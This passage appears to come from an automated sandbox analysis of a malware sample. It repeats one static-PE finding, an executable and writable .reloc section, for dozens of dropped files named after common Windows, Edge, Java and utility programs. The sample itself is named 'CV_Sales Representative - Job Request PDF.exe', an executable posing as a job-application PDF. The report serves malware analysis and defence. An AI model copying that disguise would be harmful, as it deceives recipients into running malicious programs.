            Source: ssvagent.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: tnameserv.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: unpack200.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: ie_to_edge_stub.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: cookie_exporter.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: FXSSVC.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: identity_helper.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: elevation_service.exe0.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: Locator.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: MsSense.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: SensorDataService.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: snmptrap.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: Spectrum.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: ssh-agent.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: TieringEngineService.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AgentService.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: vds.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: VSSVC.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: setup.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: msedgewebview2.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: msedge_proxy.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: msedge_pwa_launcher.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: notification_click_helper.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: pwahelper.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: msedge_proxy.exe0.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: pwahelper.exe0.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AppVDllSurrogate.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: wbengine.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: WmiApSrv.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: wmpnetwk.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: SearchIndexer.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: 7z.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: 7zFM.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: 7zG.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AppVDllSurrogate32.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AppVDllSurrogate64.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AppVLP.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: OneDriveSetup.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: Integrator.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AppSharingHookController.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: Common.ShowHelp.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: CV_Sales Representative - Job Request PDF.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: DiagnosticsHub.StandardCollector.Service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: plugin-container.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: private_browsing.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: javaw.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: javaws.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: jjs.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: jp2launcher.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: keytool.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: kinit.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: klist.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: updater.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: ktab.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: orbd.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: Au3Info.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: pack200.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: Au3Info_x64.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AutoIt3Help.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AutoIt3_x64.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: SciTE.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: updater.exe0.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AdobeARMHelper.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: elevation_service.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: maintenanceservice.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: msdtc.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: msiexec.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: PerceptionSimulationService.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: perfhost.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: policytool.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: rmid.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: rmiregistry.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: servertool.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: ssvagent.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: tnameserv.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: unpack200.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: ie_to_edge_stub.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: cookie_exporter.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: FXSSVC.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: identity_helper.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: elevation_service.exe0.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: Locator.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: MsSense.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: SensorDataService.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: snmptrap.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: Spectrum.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: ssh-agent.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: TieringEngineService.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AgentService.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: vds.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: VSSVC.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: setup.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: msedgewebview2.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: msedge_proxy.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: msedge_pwa_launcher.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: notification_click_helper.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: pwahelper.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: msedge_proxy.exe0.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: pwahelper.exe0.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AppVDllSurrogate.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: wbengine.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: WmiApSrv.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: wmpnetwk.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: SearchIndexer.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: 7z.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: 7zFM.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
